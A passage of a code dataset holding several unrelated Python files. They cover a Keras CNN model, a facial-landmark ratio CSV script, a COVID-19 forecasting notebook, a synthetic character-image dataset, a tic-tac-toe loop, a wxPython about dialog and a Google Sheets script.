https://keras.io/examples/mnist_cnn/\n \"\"\"\n def __init__(self,config,ds,name=None):\n super().__init__(config,ds,name=name)\n if name is None:\n self.name = \"SNet\"\n self._modelCache = \"{0}-model.h5\".format(self.name)\n self._weightsCache = \"{0}-weights.h5\".format(self.name)\n self._mgpu_weightsCache = \"{0}-mgpu-weights.h5\".format(self.name)\n \n self.cache_m = CacheManager()\n self.cache_m.registerFile(os.path.join(config.model_path,self._modelCache),self._modelCache)\n self.cache_m.registerFile(os.path.join(config.weights_path,self._weightsCache),self._weightsCache)\n self.cache_m.registerFile(os.path.join(config.weights_path,self._mgpu_weightsCache),self._mgpu_weightsCache)\n\n self.single = None\n self.parallel = None\n \n def get_model_cache(self):\n \"\"\"\n Returns path to model cache\n \"\"\"\n return self.cache_m.fileLocation(self._modelCache)\n \n def get_weights_cache(self):\n \"\"\"\n Returns path to model cache\n \"\"\"\n return self.cache_m.fileLocation(self._weightsCache)\n\n def get_mgpu_weights_cache(self):\n \"\"\"\n Returns path to model cache\n \"\"\"\n return self.cache_m.fileLocation(self._mgpu_weightsCache)\n\n \n def _build(self,width,height,channels,**kwargs):\n \"\"\"\n @param pre_trained : returned model should be pre-trained or not\n @param data_size : size of the training dataset\n \"\"\"\n training = kwargs.get('training',None)\n feature = kwargs.get('feature')\n preload = kwargs.get('preload')\n allocated_gpus = kwargs.get('allocated_gpus')\n \n if backend.image_data_format() == 'channels_first':\n input_shape = (channels, height, width)\n else:\n input_shape = (height, width, channels)\n\n self.cache_m = CacheManager()\n \n model = self._build_architecture(input_shape,training,feature)\n return self._configure_compile(model,allocated_gpus)\n\n def _configure_compile(self,model,allocated_gpus):\n #Check if previous training and LR is saved, if so, use it\n lr_cache = \"{0}_learning_rate.txt\".format(self.name)\n self.cache_m.registerFile(os.path.join(self._config.cache,lr_cache),lr_cache)\n l_rate = 0.0005\n if os.path.isfile(self.cache_m.fileLocation(lr_cache)) and not self._config.new_net:\n l_rate = float(self.cache_m.read(lr_cache))\n if self._config.info:\n print(\"Found previous learning rate: {0}\".format(l_rate))\n \n #opt = optimizers.SGD(lr=l_rate, decay=1.5e-4, momentum=0.9, nesterov=True)\n #opt = optimizers.Adam(lr = l_rate)\n opt = optimizers.Adadelta()\n\n #Return parallel model if multiple GPUs are available\n parallel_model = None\n \n if self._config.gpu_count > 1:\n with tf.device('/cpu:0'):\n model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\n parallel_model = multi_gpu_model(model,gpus=self._config.gpu_count)\n parallel_model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'],\n #options=p_opt, \n #run_metadata=p_mtd\n )\n else:\n model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'],\n #options=p_opt, \n #run_metadata=p_mtd\n )\n\n return (model,parallel_model)\n\n def _build_architecture(self,input_shape,training,feature,preload=True,ensemble=False):\n \n model = Sequential()\n model.add(Convolution2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\n model.add(Convolution2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(self._ds.nclasses, activation='softmax'))\n\n return model\n\n\nclass SmallNet(SNet):\n \"\"\"\n Bayesian model for the KNet\n \"\"\"\n def __init__(self,config,ds):\n super(SmallNet,self).__init__(config=config,ds=ds,name = \"SmallNet\")\n\n\n def _build_architecture(self,input_shape,training,feature,preload=True,ensemble=False):\n if hasattr(self,'data_size'):\n weight_decay = 2.5/float(self.data_size)\n if self._config.verbose > 1:\n print(\"Setting weight decay to: {0}\".format(weight_decay))\n else:\n weight_decay = 0.01\n \n inp = Input(shape=input_shape)\n\n #Block 1\n x = Convolution2D(32, (4, 4),input_shape=input_shape,\n strides=1,\n padding='valid',\n name='block1_conv1')(inp)\n x = Activation('relu')(x)\n\n x = Convolution2D(32, (4, 4),\n strides=1,\n padding='valid',\n name='block1_conv2')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D(pool_size=(2, 2),strides=2)(x)\n x = Dropout(0.25)(x,training=training)\n\n #Block 2\n x = Convolution2D(64, (4, 4),\n strides=1,\n padding='valid',\n name='block2_conv1')(x)\n x = Activation('relu')(x)\n\n x = Convolution2D(64, (4, 4),\n strides=1,\n padding='valid',\n name='block2_conv2')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D(pool_size=(2, 2),strides=2)(x)\n x = Dropout(0.25)(x,training=training)\n\n #Feature blocl\n x = Convolution2D(1536, 1,\n strides=1,\n padding='valid')(x)\n x = GlobalAveragePooling2D(name='feature')(x)\n \n #x = Flatten()(x)\n x = Dense(128,kernel_regularizer=regularizers.l2(weight_decay))(x)\n x = Dropout(0.5)(x,training=training)\n x = Dense(self._ds.nclasses)(x)\n output = Activation('softmax')(x)\n\n body = Model(inp,output,name=self.name)\n \n if ensemble:\n return (body,inp)\n else:\n return body\n \n","sub_path":"Models/ALTransf/Transfnet.py","file_name":"Transfnet.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34951316","text":"import sys, os, math, csv\n\naRatios = []\n\ndef DistForm( c, a, b ): #Formula for distance between two points, also makes data numeric\n\treturn math.sqrt(((float(c[a][0])-float(c[b][0]))**2)+((float(c[a][1])-float(c[b][1]))**2))\n\ndef RatioCalc( data ):\t\n\tc = {0:[],1:[],2:[],3:[],4:[],5:[],6:[],7:[],8:[],9:[],10:[],\n\t11:[],12:[],13:[],14:[],15:[],16:[],17:[],18:[],19:[],20:[],21:[]} #Holds the 22 points in an x,y format\n\n\tfor point, key in zip(data, c):\n\t\tc[key] = point.split(\" \")\n\n\tratioList = []\n\t#Eye Length Ratio\n\tratioList.append( (DistForm(c, 9, 10) +\n\t\t\t\t\t\tDistForm(c, 11, 12)) /\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\t#Eye Distance Ratio\n\tratioList.append( DistForm(c, 0, 1)/\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\t#Nose Ratio\n\tratioList.append( DistForm(c, 15, 16)/\n\t\t\t\t\t\tDistForm(c, 20, 21) )\n\t#Lip Size Ratio\n\tratioList.append( DistForm(c, 2, 3)/\n\t\t\t\t\t\tDistForm(c, 17, 18) )\n\t#Lip Length Ratio\n\tratioList.append( DistForm(c, 2, 3)/\n\t\t\t\t\t\tDistForm(c, 20, 21) )\n\t#Eye Brow Length Ratio\n\tif DistForm(c, 4, 5) < DistForm(c, 6, 7):\n\t\tratioList.append( DistForm(c, 6, 7)/\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\telse:\n\t\tratioList.append( DistForm(c, 4, 5)/\n\t\t\t\t\t\tDistForm(c, 8, 13) )\n\t#Aggressive Ratio\n\tratioList.append( DistForm(c, 10, 19)/\n\t\t\t\t\t\tDistForm(c, 20, 21) )\n\n\treturn ratioList\n\ndef DataPusher( root, person, inFiles ):\n\tfor file in inFiles:\n\t\tif '-01' in file or '-02' in file or '-03' in file:\n\t\t\ttext_file = open(root + person + file)\n\t\t\tlines = text_file.read().splitlines()\n\t\t\tlines = lines[3:25]\n\t\t\tratios = RatioCalc(lines)\n\t\t\tif 'm-' in file:\n\t\t\t\tif '-01' in file:\n\t\t\t\t\tratios.insert(0,'neutral')\n\t\t\t\t\tratios.insert(0,'male')\n\t\t\t\telif '-02' in file:\n\t\t\t\t\tratios.insert(0,'smiling')\n\t\t\t\t\tratios.insert(0,'male')\n\t\t\t\telif '-03' in file:\n\t\t\t\t\tratios.insert(0,'anger')\n\t\t\t\t\tratios.insert(0,'male')\n\t\t\telif 'w-' in file:\n\t\t\t\tif '-01' in file:\n\t\t\t\t\tratios.insert(0,'neutral')\n\t\t\t\t\tratios.insert(0,'female')\n\t\t\t\telif '-02' in file:\n\t\t\t\t\tratios.insert(0,'smiling')\n\t\t\t\t\tratios.insert(0,'female')\n\t\t\t\telif '-03' in file:\n\t\t\t\t\tratios.insert(0,'anger')\n\t\t\t\t\tratios.insert(0,'female')\n\t\t\taRatios.append(ratios)\n\n\nif len(sys.argv) == 1: #Either inline or post location of the data directory\n\tdataDir = input(\"Enter the name of the directory containing the data: \") + '/'\n\tcsvFile = input(\"Name of the output file: \")\nelse:\n\tdataDir = sys.argv[1] + '/'\n\tcsvFile = sys.argv[2]\n\nif csv[-4:] != '.csv':\n\tcsvFile = csvFile + '.csv'\n\ninDir = os.listdir(dataDir) # Get a list of inner directories\ninDir = [x for x in inDir if not 'pts' in x]\n\nfor directory in inDir:\n\tdirectory = directory + '/'\n\tinFiles = os.listdir(dataDir + directory)\n\tDataPusher(dataDir, directory, inFiles)\n\naRatios.insert(0, ['Sex', 'Expression', 'R1', 'R2', 'R3', 'R4', 'R5', 'R6', 'R7']) #Header for csv\n\nwith open(csvFile, 'w', newline='') as f:\n\twriter = csv.writer(f)\n\twriter.writerows(aRatios)\n\nprint('CSV Made') #On completion\n\nimport Analyser","sub_path":"CSVMaker.py","file_name":"CSVMaker.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"111261644","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[18]:\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 14 20:38:54 2020\n\n@author: Onkar, Chaitanya, Prashant\n\"\"\"\n\nimport pycountry\nimport datetime\nimport pandas as pd\nfrom datetime import date\nfrom functools import reduce\n\nimport plotly.express as px\nfrom fbprophet import Prophet\n\n\n# In[19]:\n\n\n\ndef getDaysTillToday(today):\n date_time_obj = datetime.datetime.strptime(today, '%m/%d/%Y')\n today = date.today()\n delta = today - date_time_obj.date()\n return delta.days\n\n\ndef readData(data, case_type):\n # data.head()\n dataset = data.groupby(['ObservationDate']).sum()\n observationDates = dataset.index.values.tolist()\n cases = dataset[case_type].tolist()\n\n dataset = pd.DataFrame()\n dataset.insert(0, \"ds\", observationDates, True)\n dataset.insert(1, \"y\", cases, True)\n\n return dataset\n\n\n# In[20]:\n\n\n\ndef trainModel(dataset, prophet):\n prophet.fit(dataset)\n future = prophet.make_future_dataframe(periods=days)\n forecast = prophet.predict(future)\n return forecast\n \n\n\n# In[21]:\n\n\n\ndef getCountryMap():\n\n countries = list(pycountry.countries)\n Country_Codes = []\n \n for each_country in range(len(countries)):\n n = [countries[each_country].name, countries[each_country].alpha_3]\n Country_Codes.append(n)\n \n Country_Codes = pd.DataFrame(Country_Codes)\n Country_Codes.drop_duplicates()\n Country_Codes.columns = [\"Country\", \"ISO_Code\"]\n Country_Codes.set_index('Country', inplace=True)\n \n country_map = Country_Codes.to_dict('index')\n return country_map\n\n\ndef addCountryCode(data):\n Country_Region = data['Country/Region']\n ISO_Code = []\n \n for each_country in Country_Region:\n try:\n ISO_Code.append(country_map[each_country]['ISO_Code'])\n except:\n ISO_Code.append(each_country)\n\n exceptions = {'Macau': 'MAC', 'South Korea': 'KOR', 'Ivory Coast': 'CIV', \n 'Others': 'Others', 'North Ireland': 'GBR', 'Republic of Ireland': 'IRL',\n 'St. Martin': 'MAF', 'occupied Palestinian territory': 'PSE',\n \"('St. Martin',)\": 'MAF', 'Channel Islands': 'GBR', 'Gambia, The': 'GMB',\n 'Congo (Kinshasa)': 'COD', 'Congo (Brazzaville)': 'COD', 'Bahamas, The': 'BHS',\n 'Cape Verde': 'CPV', 'East Timor': 'TLS', 'Laos': 'LAO',\n 'Diamond Princess': 'Others', 'West Bank and Gaza': 'TKM', 'MS Zaandam': 'Others',\n 'Taiwan':'TWN', 'Vietnam':'VNM', 'Russia':'RUS', 'Others':'Others',\n 'Iran':'IRN', 'Azerbaijan':'AZE', 'Czech Republic':'CZE',\n 'Saint Barthelemy':'BLM', 'Palestine':\"PSE\", 'Vatican City':'VAT', \n 'Moldova':'MDA', 'Brunei':'BRN', 'Holy See':'VAT', 'Bolivia':'BOL', \n 'Reunion':'REU', 'Venezuela':'VEN', 'Curacao':'CUW', 'Kosovo':'RKS',\n 'Republic of the Congo':'COG', 'Tanzania':'TZA', 'The Bahamas':'BHS', \n 'The Gambia':'GMB', 'Syria':'SYR', ' Azerbaijan':'AZE'\n }\n\n for x in range(len(ISO_Code)):\n if ISO_Code[x] in exceptions.keys():\n ISO_Code[x] = exceptions[ISO_Code[x]]\n \n data[\"ISO_Code\"] = ISO_Code\n return data\n\n\ndef getTopCountries(cap):\n \n USA = data.loc[data['ISO_Code'] == 'USA']\n for x in range(1, (len(Top_Country_Codes)-(34-cap))):\n USA = USA.append(data.loc[data['ISO_Code'] == Top_Country_Codes[x]])\n \n return USA\n\n\n# In[22]:\n\n\n\ndef plotMap(dataset, isPred):\n if isPred:\n text = \"Corona Virus Prediction\"\n else:\n text = 'Corona Virus Spread in The World'\n\n df_plot = dataset.groupby('ISO_Code').max().reset_index()\n fig = px.choropleth(df_plot, locations=\"ISO_Code\",\n color=\"Confirmed\",\n hover_data=[\"Confirmed\", \"Deaths\", \"Recovered\"],\n color_continuous_scale=\"Viridis\")\n fig.update_geos(fitbounds=\"locations\", visible=True)\n fig.update_layout(margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0}, title_text = text)\n return fig\n\n\ndef plotTopCountries(cap):\n topCountries = getTopCountries(cap)\n put_text = \"Prediction for Top {} Countries\".format(cap)\n fig = px.line(topCountries, x=\"ObservationDate\", y=\"Confirmed\", color='ISO_Code', hover_data=['Recovered', 'Deaths'])\n annotations = []\n annotations.append(dict(xref='paper', yref='paper', x=0.0, y=1.05,\n xanchor='left', yanchor='bottom',\n text=put_text,\n font=dict(family='Arial', size=30,\n color='rgb(37,37,37)'), showarrow=False))\n\n fig.update_layout(annotations=annotations)\n fig.show()\n\n\n# In[23]:\n\n\n\ndef predictTopCountries(cap):\n predictionsForAllCountries = []\n\n for country in range(len(Top_Country_Codes)-(34-cap)):\n\n country_data = data[data['ISO_Code']==Top_Country_Codes[country]]\n\n country_confirmed = readData(country_data, 'Confirmed')\n country_recovered = readData(country_data, 'Recovered')\n country_deaths = readData(country_data, 'Deaths')\n\n model = Prophet(yearly_seasonality=True, daily_seasonality=True)\n country_confirmed_forecast = trainModel(country_confirmed, model)\n\n country_confirmed_forecast = country_confirmed_forecast[[\"ds\",\"yhat\"]]\n country_confirmed_forecast = country_confirmed_forecast.rename(columns = {'yhat':'Confirmed'})\n\n model = Prophet(yearly_seasonality=True, daily_seasonality=True)\n country_recovered_forecast = trainModel(country_recovered, model)\n\n country_recovered_forecast = country_recovered_forecast[[\"ds\",\"yhat\"]]\n country_recovered_forecast = country_recovered_forecast.rename(columns = {'yhat':'Recovered'})\n\n model = Prophet(yearly_seasonality=True, daily_seasonality=True)\n country_deaths_forecast = trainModel(country_deaths, model)\n\n country_deaths_forecast = country_deaths_forecast[[\"ds\",\"yhat\"]]\n country_deaths_forecast = country_deaths_forecast.rename(columns = {'yhat':'Deaths'})\n\n predictedDataset = []\n predictedDataset.append(country_confirmed_forecast)\n predictedDataset.append(country_deaths_forecast)\n predictedDataset.append(country_recovered_forecast)\n\n predictedDataset = reduce(lambda left,right: pd.merge(left,right,on='ds'), predictedDataset)\n predictedDataset[\"ISO_Code\"] = Top_Country_Codes[country]\n predictedDataset[\"Country/Region\"] = Top_Country_Names[country]\n\n predictionsForAllCountries.append(predictedDataset)\n\n return predictionsForAllCountries\n\n\n# In[24]:\n\n\n\nTop_Country_Codes = ['USA','ESP','RUS','GBR','ITA','BRA',\n 'FRA','DEU','TUR','IRN','CHN', 'IND', \n 'PER', 'CAN', 'BEL', 'SAU', 'NLD', 'MEX', \n 'CHL', 'PAK', 'ECU', 'CHE', 'SWE', 'PRT', \n 'QAT', 'BLR', 'SGP', 'IRL', 'ARE', 'BGD',\n 'POL', 'UKR', 'JPN']\n\nTop_Country_Names = ['United States','Spain','Russia', 'UK', 'Italy',\n 'Brazil','France','Germany','Turkey', 'Iran', 'China',\n 'India','Peru','Canada','Belgium','Saudi Arabia',\n 'Netherlands','Mexico','Chile','Pakistan','Ecuador',\n 'Switzerland','Sweden','Portugal','Qatar','Belarus',\n 'Singapore','Ireland','United Arab Emirates',\n 'Bangladesh','Poland','Ukraine','Japan']\n\n\n# In[25]:\n\n\n\ndata = pd.read_csv(\"./novel-corona-virus-2019-dataset/covid_19_data.csv\")\n\ntoday = data['ObservationDate'].unique().max()\ndays = getDaysTillToday(today)\n\n\n# In[26]:\n\n\n\ncountry_map = getCountryMap()\ndata.replace({'Country/Region': 'Mainland China'}, 'China', inplace=True)\ndata.replace({'Country/Region': 'US'}, 'USA', inplace=True)\ndata.replace({'Country/Region': 'Burma'}, 'Myanmar', inplace=True)\n\ndata = addCountryCode(data)\n\ndata.head()\n\n\n# In[27]:\n\n\n\nfig = plotMap(data, False)\nfig.show()\n\n\n# In[11]:\n\n\n\nprophet = Prophet(yearly_seasonality=True, daily_seasonality=True)\n\nconfirmed_cases = readData(data, 'Confirmed')\nconfirmed_forecast = trainModel(confirmed_cases, prophet)\nfig_confirmed = prophet.plot(confirmed_forecast, xlabel=\"Date\", ylabel=\"Number of Confirmed cases worldwide\")\n\n\n# In[28]:\n\n\n\nprophet = Prophet(yearly_seasonality=True, daily_seasonality=True)\n\ndeath_cases = readData(data, 'Deaths')\ndeath_forecast = trainModel(death_cases, prophet)\nfig_death = prophet.plot(death_forecast, xlabel=\"Date\", ylabel=\"Number of deaths worldwide\")\n\n\n# In[29]:\n\n\n\nprophet = Prophet(yearly_seasonality=True, daily_seasonality=True)\n\nrecovered_cases = readData(data, 'Recovered')\nrecovered_forecast = trainModel(recovered_cases, prophet)\nfig_recovered = prophet.plot(recovered_forecast, xlabel=\"Date\", ylabel=\"Number of recoveries worldwide\")\n\n\n# In[14]:\n\n\n\npredictionsForTopCountries = predictTopCountries(5)\n\ntopCountries = pd.concat(predictionsForTopCountries)\n\nfig = plotMap(topCountries, True)\nfig.show()\n\n\n# In[16]:\n\n\nplotTopCountries(5)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"COVID 19 Predictor/Covid19_prodictor.py","file_name":"Covid19_prodictor.py","file_ext":"py","file_size_in_byte":9098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179372101","text":"import numpy as np\nimport torch\nfrom PIL import Image, ImageDraw, ImageFont, ImageOps\nimport random\nimport os\nfrom torch import nn\nimport cv2\n\n\ndef get_pic_with_text(text\n\n , background\n , mask\n , fontsize=100\n , offset=(0, 0)\n , rotate=0\n , font=None\n ):\n # set parameter\n w = int(fontsize * 0.6)\n h = int(fontsize)\n x, y = offset\n center = [int(x + w / 2), int(y + h / 2)]\n patch_center = int(w / 2), int(h / 2)\n\n bw, bh = background.shape[:2]\n mw, mh = mask.shape[:2]\n scale_w, scale_h = 1.0 * bw / mw, 1.0 * bh / mh\n\n # initial initmage\n img = Image.fromarray(background)\n draw = ImageDraw.Draw(img)\n\n # draw patch\n patch = Image.new('L', (w, h))\n d = ImageDraw.Draw(patch)\n d.text((0, 0), text, font=font, fill=255)\n\n patch = patch.rotate(rotate, expand=1, center=patch_center)\n w, h = patch.size\n center = [int((x + w / 2) // scale_w), int((y + h / 2) // scale_h)]\n img.paste(ImageOps.colorize(patch, (0, 0, 0), (255, 255, 255)), offset, patch)\n\n ry, rx = int(patch.size[0] // 2 // scale_h), int(patch.size[1] // 2 // scale_w)\n radius = (ry, rx)\n\n mask_patch = get_mask((ry, rx))\n _mask = np.maximum(mask[center[1] - radius[1]:center[1] + radius[1], center[0] - radius[0]:center[0] + radius[0]],\n mask_patch)\n mask[center[1] - rx:center[1] + rx, center[0] - ry:center[0] + ry] = _mask\n\n return np.asarray(img, dtype=np.uint8), mask, center, (w, h)\n\n\ndef random_position(image_size, fontsize):\n mx, my = image_size\n w = int(fontsize * 0.6)\n h = int(fontsize)\n min_x, min_y = 0, 0\n max_x, max_y = mx - w * 1.8, my - h * 1.8\n return random.randint(min_x, max_x), random.randint(min_y, max_y)\n\n\ndef random_char(char_set):\n return random.choice(char_set)\n\n\ndef get_mask(radius, scale=1):\n rx, ry = radius\n X = np.linspace(-rx, rx, 2 * rx)\n Y = np.linspace(-ry, ry, 2 * ry)\n X, Y = np.meshgrid(X, Y)\n\n # Mean vector and covariance matrix\n mu = np.array([0., 0.])\n Sigma = np.array([[scale * rx, 0], [0, scale * ry]])\n pos = np.empty(X.shape + (2,))\n pos[:, :, 0] = X\n pos[:, :, 1] = Y\n\n def multivariate_gaussian(pos, mu, Sigma):\n n = mu.shape[0]\n Sigma_det = np.linalg.det(Sigma)\n Sigma_inv = np.linalg.inv(Sigma)\n N = np.sqrt((2 * np.pi) ** n * Sigma_det)\n\n # This einsum call calculates (x-mu)T.Sigma-1.(x-mu) in a vectorized\n # way across all the input variables.\n fac = np.einsum('...k,kl,...l->...', pos - mu, Sigma_inv, pos - mu)\n\n return np.exp(-fac / 2) / N\n\n # The distribution on the variables X, Y packed into pos.\n Z = multivariate_gaussian(pos, mu, Sigma)\n Z = Z / np.max(Z)\n return Z\n\n\ndef generate_pic(\n charSet\n , rotate\n , size\n , fontsize\n , font\n , num_char_per_pic=10\n , inv_mask_scale=4\n\n):\n w, h = size[:2]\n img = np.ones(size, dtype=np.uint8) * 0\n mask = np.zeros((w // inv_mask_scale, h // inv_mask_scale, len(charSet)))\n center_list = []\n char_list = []\n wh_list = []\n for i, c in enumerate(charSet):\n whs = []\n center_clz = []\n for _ in range(num_char_per_pic):\n img, single_mask, center, wh = get_pic_with_text(\n text=c\n , background=img\n , mask=mask[..., i]\n , fontsize=fontsize\n , offset=random_position(size[:2], fontsize)\n , font=font\n , rotate=random.randint(rotate[0], rotate[1]))\n whs.append(wh)\n mask[..., i] = single_mask\n char_list.append(c)\n center_clz.append(center)\n\n center_list.append(center_clz)\n wh_list.append(whs)\n\n return img, mask, center_list, char_list, wh_list\n\n\n'''\nbatch = {\n,\"needle\":torch.ones(1,3,256,256).cuda()\n\"hm\": torch.ones(1,1,64,64).cuda()\n,'wh_mask': torch.ones(1,max_objects).cuda()\n,'ind': torch.ones(1,max_objects).type('torch.LongTensor').cuda()\n,'wh': torch.ones(1,max_objects,wh_dim).cuda()\n}\n'''\n\n\ndef generate_batch(\n # batch_size=1\n size=[256, 256, 3]\n , needle_size=[100, 100, 3]\n , fontsize=50\n , charSet=[\"A\", \"B\", \"C\"]\n , rotate=(-20, 20)\n , font=None\n , num_char_per_pic=3\n , inv_mask_scale=4\n , seed=None\n):\n if seed:\n random.seed(seed)\n num_clz = len(charSet)\n char2idx = dict(zip(charSet, range(len(charSet))))\n\n stack, hm, center_list, char_list, whs = generate_pic(charSet, rotate=rotate, fontsize=fontsize, font=font,\n size=size, num_char_per_pic=num_char_per_pic,\n inv_mask_scale=inv_mask_scale)\n needle_char = random.choice(char_list)\n needle, _, _, _, _ = generate_pic(needle_char, rotate, size=needle_size, num_char_per_pic=1, font=font,\n fontsize=fontsize)\n needle_idx = char2idx[needle_char]\n\n # wh_gt = torch.zeros([num_char_per_pic, 2,size[0],size[2]])\n # for i,(wc,wd) in enumerate(batch2[\"pos\"]):\n # wh_gt[:,wc,wd] = batch2[\"wh\"][i]\n\n pos = np.array(center_list[needle_idx])\n hm = np.array(hm[..., needle_idx], dtype=np.float32)\n return {\n \"stack\": np.array(stack, dtype=np.float32) # 在图像中查找物体 w,h,c\n , \"needle\": np.array(needle, dtype=np.float32) # 需要查找到物体图像 w,h,c\n , \"hm\": hm # 中心点热力图\n , \"wh_mask\": np.array(np.arange(num_char_per_pic)) # 类别\n , 'pos': pos # 中心点原始坐标\n , \"ind\": pos[..., 0] * hm.shape[1] + pos[..., 1] # 中心点编码坐标\n , \"wh\": np.array(whs[needle_idx], dtype=np.float32) # 宽度\n # , \"wh_gt\": wh_gt\n }\n\ndef get_font(file, size=50):\n ImageFont.truetype(file, size)\n\nimport torch.utils.data as data\n\n\nclass CTNumberDataset(data.Dataset):\n num_classes = 3\n default_resolution = [512, 512]\n mean = np.array([0.40789654, 0.44719302, 0.47026115],\n dtype=np.float32).reshape(1, 1, 3)\n std = np.array([0.28863828, 0.27408164, 0.27809835],\n dtype=np.float32).reshape(1, 1, 3)\n\n def __init__(self, start=0, length=100000, transform=None,\n size=[256, 256, 3]\n , needle_size=[100, 100, 3]\n , fontsize=50\n , charSet=[\"A\", \"B\", \"C\"]\n , rotate=(-20, 20)\n , font=None\n , num_char_per_pic=3\n , inv_mask_scale=4\n ):\n self.start = 0\n self.length = length\n self.transform = transform\n self.inputs = [\"stack\", \"needle\"]\n self.size = size\n self.needle_size = needle_size\n self.fontsize = fontsize\n self.charSet = charSet\n self.rotate = rotate\n self.font = font\n self.num_char_per_pic = num_char_per_pic\n self.inv_mask_scale = inv_mask_scale\n\n def __getitem__(self, index):\n x = generate_batch(\n size=self.size\n , needle_size=self.needle_size\n , fontsize=self.fontsize\n , charSet=self.charSet\n , rotate=self.rotate\n , font=self.font\n , num_char_per_pic=self.num_char_per_pic\n , inv_mask_scale=self.inv_mask_scale\n , seed=index + self.start)\n if self.transform is not None:\n x = self.transform(x)\n return x\n\n def __len__(self):\n return self.length\n","sub_path":"src/lib/datasets/sample/char_gen.py","file_name":"char_gen.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399043886","text":"import Morpion\r\nimport time\r\n\r\nm = Morpion.Morpion()\r\ntableau = m.contenu\r\n\r\nplayer = True\r\nm.print_tableau()\r\nm.contenu = ['-','-','-','-','-','-','-','-','-']\r\nwhile m.victoire == False and m.nul == False:\r\n if player == True:\r\n case = int(input('Entre la case dans laquelle tu veux jouer: '))\r\n m.coup(player,case)\r\n else:\r\n case = m.random_IA\r\n m.coup(player,case)\r\n m.print_tableau()\r\n m.verification(player)\r\n player = not player\r\n","sub_path":"Morpion/main_random.py","file_name":"main_random.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422029089","text":"#!/usr/bin/env python\n\n'''About OpenFOAM'''\n\nimport wx\nimport wx.html\nimport cPickle\nimport const\n\nclass FoamFrame(wx.Frame):\n '''test frame'''\n def __init__(self, *args, **kwargs):\n self.title = \"test Frame\"\n wx.Frame.__init__(self, None, -1, self.title, *args, **kwargs)\n\n #standart frame items \n self.createMenuBar()\n\n def menuData(self):\n '''menu items data base'''\n return [\n (\"&Help\", (\n (\"About...\", \"Show about window\", self.OnAbout),\n (\"\", \"\", \"\")))]\n \n def createMenuBar(self):\n menuBar = wx.MenuBar()\n for eachMenuData in self.menuData():\n menuLabel = eachMenuData[0]\n menuItems = eachMenuData[1]\n menuBar.Append(self.createMenu(menuItems), menuLabel)\n self.SetMenuBar(menuBar)\n\n def createMenu(self, menuData):\n menu = wx.Menu()\n for eachItem in menuData:\n if len(eachItem) == 2:\n label = eachItem[0]\n subMenu = self.createMenu(eachItem[1])\n menu.AppendMenu(wx.NewId(), label, subMenu)\n else:\n self.createMenuItem(menu, *eachItem)\n return menu\n\n def createMenuItem(self, menu, label, status, handler, ID=-1, kind=wx.ITEM_NORMAL):\n if not label:\n menu.AppendSeparator()\n return\n menuItem = menu.Append(ID, label, status, kind)\n self.Bind(wx.EVT_MENU, handler, menuItem)\n\n def OnAbout(self, event):\n dlg = OpenFoamAbout(self)\n dlg.ShowModal() #show dilog box, modal means cannot do anything till press \"OK\"\n dlg.Destroy()\n\nclass OpenFoamAbout(wx.Dialog):\n \"\"\"About message\"\"\"\n text = '''\n\n\n
\n\n \n\n

OpenFOAM GUI!

\n
\n

OpenFOAM GUI is a visualization program for generating\nan OpenFOAM case and runing it on the bwHPC-C5 computers cluster.\n

\n\n

More information on OpenFOAM is available at http://www.openfoam.org/\nand about bwHPC-C5 project on http://www.bwhpc-c5.de

\n\n\n'''\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, -1, \"About OpenFOAM GUI\",\n size=(440, 400))\n html = wx.html.HtmlWindow(self)\n html.SetPage(self.text)\n button = wx.Button(self, wx.ID_OK, \"Okay\")\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(html, 1, wx.EXPAND|wx.ALL, const.sizerBorder)\n sizer.Add(button, 0, wx.ALIGN_CENTER|wx.ALL, const.sizerBorder)\n\n self.SetSizer(sizer)\n self.Layout()\n \n \n\nif __name__ == '__main__':\n app = wx.App(False)\n frame = FoamFrame()\n frame.Show(True)\n frame.Center(wx.BOTH)\n app.MainLoop()\n","sub_path":"aboutFoam.py","file_name":"aboutFoam.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635240519","text":"import gspread\nimport matches\nimport argparse\n\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# use creds to create a client to interact with the Google Drive API\nscope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive', 'https://www.googleapis.com/auth/spreadsheets']\ncreds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\nclient = gspread.authorize(creds)\n\n#parse for the search entry\nparser = argparse.ArgumentParser(description='Input a search entry')\nparser.add_argument('searchEntry', nargs='?', help='search for name of value')\nargs = parser.parse_args()\n\n# Find a workbook by name and open the first sheet\n# Make sure you use the right name here.\nsheet = client.open(\"Sector Taxonomy\")\n\n# Select the references worksheet of the CRANE sheets\nworksheet = sheet.worksheet(\"References\")\n\n# find cell, which columns to search in?\n#searchEntry = args[0]\nsearchEntry = \"Extreme 